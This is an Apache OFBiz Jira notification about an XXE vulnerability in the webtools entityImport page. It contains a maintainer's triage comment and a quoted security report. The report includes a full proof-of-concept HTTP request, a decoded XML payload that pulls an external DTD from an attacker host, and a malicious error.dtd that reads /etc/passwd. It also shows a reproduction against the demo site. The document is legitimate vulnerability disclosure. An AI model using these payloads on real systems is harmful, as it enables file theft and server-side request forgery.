[
https://issues.apache.org/jira/browse/OFBIZ-11195?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16929734#comment-16929734
]
Jacques Le Roux commented on OFBIZ-11195:
-----------------------------------------
This is only a minor risk as long as OFBiz suffers from CSRF. So I make it
dependent on OFBIZ-10427 and will close it as won't fix when OFBIZ-10427 is
done.
> XML Entity Injection in webtools/control/entityImport
> ------------------------------------------------------
>
> Key: OFBIZ-11195
> URL: https://issues.apache.org/jira/browse/OFBIZ-11195
> Project: OFBiz
> Issue Type: Sub-task
> Components: framework/webtools
> Affects Versions: Trunk
> Reporter: Jacques Le Roux
> Priority: Major
>
> This was reported to the OFBiz security team by Jason Nordenstam from
> offensive-security.com. We did not consider it as a real security issue
> because it requires authentication.
> {quote}
> Authenticated users can import XML documents containing DTDs. The SAX parser
> used by the XML Data Import functionality does not have DTD parsing
> explicitly disabled which makes it vulnerable to XXE attacks.
> The results of the import are not displayed in the page which means an
> 'error-based' approach is needed to read local files. The parser will also
> resolve external entities so this vulnerability can also be used for internal
> port scanning or server-side request forgery.
> Affected URL:
> /webtools/control/entityImport
> POC Example Request:
> POST /webtools/control/entityImport HTTP/1.1
> Host:<host>
> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Referer: <host>/webtools/control/entityImport
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 312
> Cookie: JSESSIONID=66A4289C95C78E5E7977EFF796A7D05B.jvm1; OFBiz.Visitor=10178
> Connection: close
> Upgrade-Insecure-Requests: 1
> fulltext=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21DOCTYPE+notfound+%5B%0D%0A+%3C%21ENTITY+%25+base+SYSTEM+%22http%3A%2F%2F<attacker_ip>%2Ferror.dtd%22%3E%0D%0A+%25base%3B%0D%0A+%25param1%3B+%0D%0A+%25external%3B%0D%0A%5D%3E%0D%0A%3Croot%3E%3Cfoo%3Ebar%3C%2Fbar%3E%3C%2Froot%3E%0D%0A
> Payload One Decoded:
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE notfound [
> <!ENTITY % base SYSTEM "http://<attacker_ip>/error.dtd">
> %base;
> %param1;
> %external;
> ]>
> <root><foo>bar</bar></root>
> error.dtd on Attacking Machine:
> <!ENTITY % payload SYSTEM "file:///etc/passwd">
> <!ENTITY % param1 "<!ENTITY % external SYSTEM 'file:///banana/%payload;'>" >
> {quote}
> We have reproduced it at
> [https://demo-stable.ofbiz.apache.org/webtools/control/entityImport]
> using:
> {code:xml}
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE notfound [
> <!ENTITY % base SYSTEM "https://demo-trunk.ofbiz.apache.org/images/error.dtd">
> %base;
> %param1;
> %external;
> ]>
> <root><foo>bar</bar></root>
> {code}
--
This message was sent by Atlassian Jira
(v8.3.2#803003)